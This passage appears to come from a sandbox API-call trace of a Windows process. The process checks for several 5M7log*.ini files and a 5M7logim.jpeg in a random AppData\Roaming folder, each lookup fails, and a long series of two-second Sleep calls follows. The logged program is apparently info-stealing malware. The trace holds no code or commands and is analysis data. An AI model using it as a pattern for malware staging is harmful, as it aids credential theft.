NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.103] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.104] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0191.104] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0191.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.104] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.104] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.104] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0191.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.104] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.104] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.104] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0191.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.104] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.104] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.104] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0191.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.104] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.104] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.104] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0191.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.105] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.105] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.105] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0191.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.105] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.105] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.105] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07310) returned 1 [0191.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.105] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.105] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.105] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e071f0) returned 1 [0191.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.105] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.105] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.105] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0191.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.105] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.105] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0191.105] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0191.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.106] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0191.106] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0191.106] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06b30) returned 1 [0191.106] Sleep (dwMilliseconds=0x7d0) [0191.107] Sleep (dwMilliseconds=0x7d0) [0191.108] Sleep (dwMilliseconds=0x7d0) [0191.110] Sleep (dwMilliseconds=0x7d0) [0191.112] Sleep (dwMilliseconds=0x7d0) [0191.114] Sleep (dwMilliseconds=0x7d0) [0191.115] Sleep (dwMilliseconds=0x7d0) [0191.117] Sleep (dwMilliseconds=0x7d0) [0191.118] Sleep (dwMilliseconds=0x7d0) [0191.120] Sleep (dwMilliseconds=0x7d0) [0191.123] Sleep (dwMilliseconds=0x7d0) [0191.125] Sleep (dwMilliseconds=0x7d0) [0191.126] Sleep (dwMilliseconds=0x7d0) [0191.128] Sleep (dwMilliseconds=0x7d0) [0191.129] Sleep (dwMilliseconds=0x7d0) [0191.131] Sleep (dwMilliseconds=0x7d0) [0191.132] Sleep (dwMilliseconds=0x7d0) [0191.136] Sleep (dwMilliseconds=0x7d0) [0191.137] Sleep (dwMilliseconds=0x7d0) [0191.138] Sleep (dwMilliseconds=0x7d0) [0191.140] Sleep (dwMilliseconds=0x7d0) [0191.141] Sleep (dwMilliseconds=0x7d0) [0191.143] Sleep (dwMilliseconds=0x7d0) [0191.144] Sleep (dwMilliseconds=0x7d0) [0191.146] Sleep (dwMilliseconds=0x7d0) [0191.147] Sleep (dwMilliseconds=0x7d0) [0191.149] Sleep (dwMilliseconds=0x7d0) [0191.150] Sleep (dwMilliseconds=0x7d0) [0191.152] Sleep (dwMilliseconds=0x7d0) [0191.153] Sleep (dwMilliseconds=0x7d0) [0191.157] Sleep (dwMilliseconds=0x7d0) [0191.159] Sleep (dwMilliseconds=0x7d0) [0191.160] Sleep (dwMilliseconds=0x7d0) [0191.162] Sleep (dwMilliseconds=0x7d0) [0191.163] Sleep (dwMilliseconds=0x7d0) [0191.165] Sleep (dwMilliseconds=0x7d0) [0191.167] Sleep (dwMilliseconds=0x7d0) [0191.169] Sleep (dwMilliseconds=0x7d0) [0191.170] Sleep (dwMilliseconds=0x7d0) [0191.172] Sleep (dwMilliseconds=0x7d0) [0191.173] Sleep (dwMilliseconds=0x7d0) [0191.175] Sleep (dwMilliseconds=0x7d0) [0191.176] Sleep (dwMilliseconds=0x7d0) [0191.179] Sleep (dwMilliseconds=0x7d0) [0191.181] Sleep (dwMilliseconds=0x7d0) [0191.182] Sleep (dwMilliseconds=0x7d0) [0191.184] Sleep (dwMilliseconds=0x7d0) [0191.185] Sleep (dwMilliseconds=0x7d0) [0191.187] Sleep (dwMilliseconds=0x7d0) [0191.188] Sleep (dwMilliseconds=0x7d0) [0191.190] Sleep (dwMilliseconds=0x7d0) [0191.191] Sleep (dwMilliseconds=0x7d0) [0191.193] Sleep (dwMilliseconds=0x7d0) [0191.194] Sleep (dwMilliseconds=0x7d0) [0191.196] Sleep (dwMilliseconds=0x7d0) [0191.197] Sleep (dwMilliseconds=0x7d0) [0191.201] Sleep (dwMilliseconds=0x7d0) [0191.203] Sleep (dwMilliseconds=0x7d0) [0191.204] Sleep (dwMilliseconds=0x7d0) [0191.206] Sleep (dwMilliseconds=0x7d0) [0191.207] Sleep (dwMilliseconds=0x7d0) [0191.209] Sleep (dwMilliseconds=0x7d0) [0191.212] Sleep (dwMilliseconds=0x7d0) [0191.215] Sleep (dwMilliseconds=0x7d0) [0191.216] Sleep (dwMilliseconds=0x7d0) [0191.218] Sleep (dwMilliseconds=0x7d0) [0191.219] Sleep (dwMilliseconds=0x7d0) [0191.224] Sleep (dwMilliseconds=0x7d0) [0191.226] Sleep (dwMilliseconds=0x7d0) [0191.228] Sleep (dwMilliseconds=0x7d0) [0191.230] Sleep (dwMilliseconds=0x7d0) [0191.231] Sleep (dwMilliseconds=0x7d0) [0191.233] Sleep (dwMilliseconds=0x7d0) [0191.234] Sleep (dwMilliseconds=0x7d0) [0191.236] Sleep (dwMilliseconds=0x7d0) [0191.237] Sleep (dwMilliseconds=0x7d0) [0191.239] Sleep (dwMilliseconds=0x7d0) [0191.240] Sleep (dwMilliseconds=0x7d0) [0191.242] Sleep (dwMilliseconds=0x7d0) [0191.245] Sleep (dwMilliseconds=0x7d0) [0191.247] Sleep (dwMilliseconds=0x7d0) [0191.249] Sleep (dwMilliseconds=0x7d0) [0191.250] Sleep (dwMilliseconds=0x7d0) [0191.252] Sleep (dwMilliseconds=0x7d0) [0191.253] Sleep (dwMilliseconds=0x7d0) [0191.256] Sleep (dwMilliseconds=0x7d0) [0191.258] Sleep (dwMilliseconds=0x7d0) [0191.260] Sleep (dwMilliseconds=0x7d0) [0191.261] Sleep (dwMilliseconds=0x7d0) [0191.263] Sleep (dwMilliseconds=0x7d0) [0191.264] Sleep (dwMilliseconds=0x7d0) [0191.266] Sleep (dwMilliseconds=0x7d0) [0191.267] Sleep (dwMilliseconds=0x7d0) [0191.269] Sleep (dwMilliseconds=0x7d0) [0191.270] Sleep (dwMilliseconds=0x7d0) [0191.272] Sleep (dwMilliseconds=0x7d0) [0191.273] Sleep (dwMilliseconds=0x7d0) [0191.275] Sleep (dwMilliseconds=0x7d0) [0191.278] Sleep (dwMilliseconds=0x7d0) [0191.280] Sleep (dwMilliseconds=0x7d0) [0191.281] Sleep (dwMilliseconds=0x7d0) [0191.283] Sleep (dwMilliseconds=0x7d0) [0191.284] Sleep (dwMilliseconds=0x7d0) [0191.286] Sleep (dwMilliseconds=0x7d0) [0191.289] Sleep (dwMilliseconds=0x7d0) [0191.291] Sleep (dwMilliseconds=0x7d0) [0191.292] Sleep (dwMilliseconds=0x7d0) [0191.294] Sleep (dwMilliseconds=0x7d0) [0191.295] Sleep (dwMilliseconds=0x7d0) [0191.297] Sleep (dwMilliseconds=0x7d0) [0191.300] Sleep (dwMilliseconds=0x7d0) [0191.302] Sleep (dwMilliseconds=0x7d0) [0191.304] Sleep (dwMilliseconds=0x7d0) [0191.305] Sleep (dwMilliseconds=0x7d0) [0191.307] Sleep (dwMilliseconds=0x7d0) [0191.308] Sleep (dwMilliseconds=0x7d0) [0191.310] Sleep (dwMilliseconds=0x7d0) [0191.311] Sleep (dwMilliseconds=0x7d0) [0191.313] Sleep (dwMilliseconds=0x7d0) [0191.314] Sleep (dwMilliseconds=0x7d0) [0191.316] Sleep (dwMilliseconds=0x7d0) [0191.317] Sleep (dwMilliseconds=0x7d0) [0191.319] Sleep (dwMilliseconds=0x7d0) [0191.322] Sleep (dwMilliseconds=0x7d0) [0191.324] Sleep (dwMilliseconds=0x7d0) [0191.325] Sleep (dwMilliseconds=0x7d0) [0191.327] Sleep (dwMilliseconds=0x7d0) [0191.328] Sleep (dwMilliseconds=0x7d0) [0191.330] Sleep (dwMilliseconds=0x7d0) [0191.332] Sleep (dwMilliseconds=0x7d0) [0191.334] Sleep (dwMilliseconds=0x7d0) [0191.335] Sleep (dwMilliseconds=0x7d0) [0191.337] Sleep (dwMilliseconds=0x7d0) [0191.338] Sleep (dwMilliseconds=0x7d0) [0191.340] Sleep (dwMilliseconds=0x7d0) [0191.341] Sleep (dwMilliseconds=0x7d0) [0191.343] Sleep (dwMilliseconds=0x7d0) [0191.345] Sleep (dwMilliseconds=0x7d0) [0191.346] Sleep (dwMilliseconds=0x7d0) [0191.348] Sleep (dwMilliseconds=0x7d0) [0191.349] Sleep (dwMilliseconds=0x7d0) [0191.351] Sleep (dwMilliseconds=0x7d0) [0191.352] Sleep (dwMilliseconds=0x7d0) [0191.354] Sleep (dwMilliseconds=0x7d0) [0191.355] Sleep (dwMilliseconds=0x7d0) [0191.357] Sleep (dwMilliseconds=0x7d0) [0191.358] Sleep (dwMilliseconds=0x7d0) [0191.360] Sleep (dwMilliseconds=0x7d0) [0191.361] Sleep (dwMilliseconds=0x7d0) [0191.363] Sleep (dwMilliseconds=0x7d0) [0191.365] Sleep (dwMilliseconds=0x7d0) [0191.367] Sleep (dwMilliseconds=0x7d0) [0191.369] Sleep (dwMilliseconds=0x7d0) [0191.370] Sleep (dwMilliseconds=0x7d0) [0191.372] Sleep (dwMilliseconds=0x7d0) [0191.373] Sleep (dwMilliseconds=0x7d0) [0191.376] Sleep (dwMilliseconds=0x7d0) [0191.378] Sleep (dwMilliseconds=0x7d0) [0191.380] Sleep (dwMilliseconds=0x7d0) [0191.381] Sleep (dwMilliseconds=0x7d0) [0191.383] Sleep (dwMilliseconds=0x7d0) [0191.384] Sleep (dwMilliseconds=0x7d0) [0191.391] Sleep (dwMilliseconds=0x7d0) [0191.394] Sleep (dwMilliseconds=0x7d0) [0191.396] Sleep (dwMilliseconds=0x7d0) [0191.397] Sleep (dwMilliseconds=0x7d0) [0191.399] Sleep (dwMilliseconds=0x7d0) [0191.400] Sleep (dwMilliseconds=0x7d0) [0191.402] Sleep (dwMilliseconds=0x7d0) [0191.403] Sleep (dwMilliseconds=0x7d0) [0191.405] Sleep (dwMilliseconds=0x7d0) [0191.406] Sleep (dwMilliseconds=0x7d0) [0191.409] Sleep (dwMilliseconds=0x7d0) [0191.411] Sleep (dwMilliseconds=0x7d0) [0191.412] Sleep (dwMilliseconds=0x7d0) [0191.414] Sleep (dwMilliseconds=0x7d0) [0191.415] Sleep (dwMilliseconds=0x7d0) [0191.417] Sleep (dwMilliseconds=0x7d0) [0191.418] Sleep (dwMilliseconds=0x7d0) [0191.420] Sleep (dwMilliseconds=0x7d0) [0191.423] Sleep (dwMilliseconds=0x7d0) [0191.425] Sleep (dwMilliseconds=0x7d0) [0191.426] Sleep (dwMilliseconds=0x7d0) [0191.428] Sleep (dwMilliseconds=0x7d0) [0191.429] Sleep (dwMilliseconds=0x7d0) [0191.431] Sleep (dwMilliseconds=0x7d0) [0191.432] Sleep (dwMilliseconds=0x7d0) [0191.434] Sleep (dwMilliseconds=0x7d0) [0191.435] Sleep (dwMilliseconds=0x7d0) [0191.437] Sleep (dwMilliseconds=0x7d0) [0191.438] Sleep (dwMilliseconds=0x7d0) [0191.440] Sleep (dwMilliseconds=0x7d0) [0191.442] Sleep (dwMilliseconds=0x7d0) [0191.445] Sleep (dwMilliseconds=0x7d0) [0191.447] Sleep (dwMilliseconds=0x7d0) [0191.448] Sleep (dwMilliseconds=0x7d0) [0191.449] Sleep (dwMilliseconds=0x7d0) [0191.451] Sleep (dwMilliseconds=0x7d0) [0191.454] Sleep (dwMilliseconds=0x7d0) [0191.456] Sleep (dwMilliseconds=0x7d0) [0191.457] Sleep (dwMilliseconds=0x7d0) [0191.459] Sleep (dwMilliseconds=0x7d0) [0191.460] Sleep (dwMilliseconds=0x7d0) [0191.462] Sleep (dwMilliseconds=0x7d0) [0191.464] Sleep (dwMilliseconds=0x7d0) [0191.467] Sleep (dwMilliseconds=0x7d0) [0191.469] Sleep (dwMilliseconds=0x7d0) [0191.470] Sleep (dwMilliseconds=0x7d0) [0191.472] Sleep (dwMilliseconds=0x7d0) [0191.473] Sleep (dwMilliseconds=0x7d0) [0191.475] Sleep (dwMilliseconds=0x7d0) [0191.476] Sleep (dwMilliseconds=0x7d0) [0191.478] Sleep (dwMilliseconds=0x7d0) [0191.479] Sleep (dwMilliseconds=0x7d0) [0191.481] Sleep (dwMilliseconds=0x7d0) [0191.482] Sleep (dwMilliseconds=0x7d0) [0191.484] Sleep (dwMilliseconds=0x7d0) [0191.488] Sleep (dwMilliseconds=0x7d0) [0191.489] Sleep (dwMilliseconds=0x7d0) [0191.491] Sleep (dwMilliseconds=0x7d0) [0191.492] Sleep (dwMilliseconds=0x7d0) [0191.494] Sleep (dwMilliseconds=0x7d0) [0191.495] Sleep (dwMilliseconds=0x7d0) [0191.499] Sleep (dwMilliseconds=0x7d0) [0191.500] Sleep (dwMilliseconds=0x7d0) [0191.502] Sleep (dwMilliseconds=0x7d0) [0191.503] Sleep (dwMilliseconds=0x7d0) [0191.505] Sleep (dwMilliseconds=0x7d0) [0191.506] Sleep (dwMilliseconds=0x7d0) [0191.510] Sleep (dwMilliseconds=0x7d0) [0191.511] Sleep (dwMilliseconds=0x7d0) [0191.513] Sleep (dwMilliseconds=0x7d0) [0191.514] Sleep (dwMilliseconds=0x7d0) [0191.516] Sleep (dwMilliseconds=0x7d0) [0191.517] Sleep (dwMilliseconds=0x7d0) [0191.519] Sleep (dwMilliseconds=0x7d0) [0191.520] Sleep (dwMilliseconds=0x7d0) [0191.522] Sleep (dwMilliseconds=0x7d0) [0191.524] Sleep (dwMilliseconds=0x7d0) [0191.526] Sleep (dwMilliseconds=0x7d0) [0191.527] Sleep (dwMilliseconds=0x7d0) [0191.532] Sleep (dwMilliseconds=0x7d0) [0191.533] Sleep (dwMilliseconds=0x7d0) [0191.535] Sleep (dwMilliseconds=0x7d0) [0191.536] Sleep (dwMilliseconds=0x7d0) [0191.538] Sleep (dwMilliseconds=0x7d0) [0191.539] Sleep (dwMilliseconds=0x7d0) [0191.543] Sleep (dwMilliseconds=0x7d0) [0191.544] Sleep (dwMilliseconds=0x7d0) [0191.545] Sleep (dwMilliseconds=0x7d0) [0191.571] Sleep (dwMilliseconds=0x7d0) [0191.572] Sleep (dwMilliseconds=0x7d0) [0191.576] Sleep (dwMilliseconds=0x7d0) [0191.577] Sleep (dwMilliseconds=0x7d0) [0191.578] Sleep (dwMilliseconds=0x7d0) [0191.580] Sleep (dwMilliseconds=0x7d0) [0191.582] Sleep (dwMilliseconds=0x7d0) [0191.583] Sleep (dwMilliseconds=0x7d0) [0191.587] Sleep (dwMilliseconds=0x7d0) [0191.588] Sleep (dwMilliseconds=0x7d0) 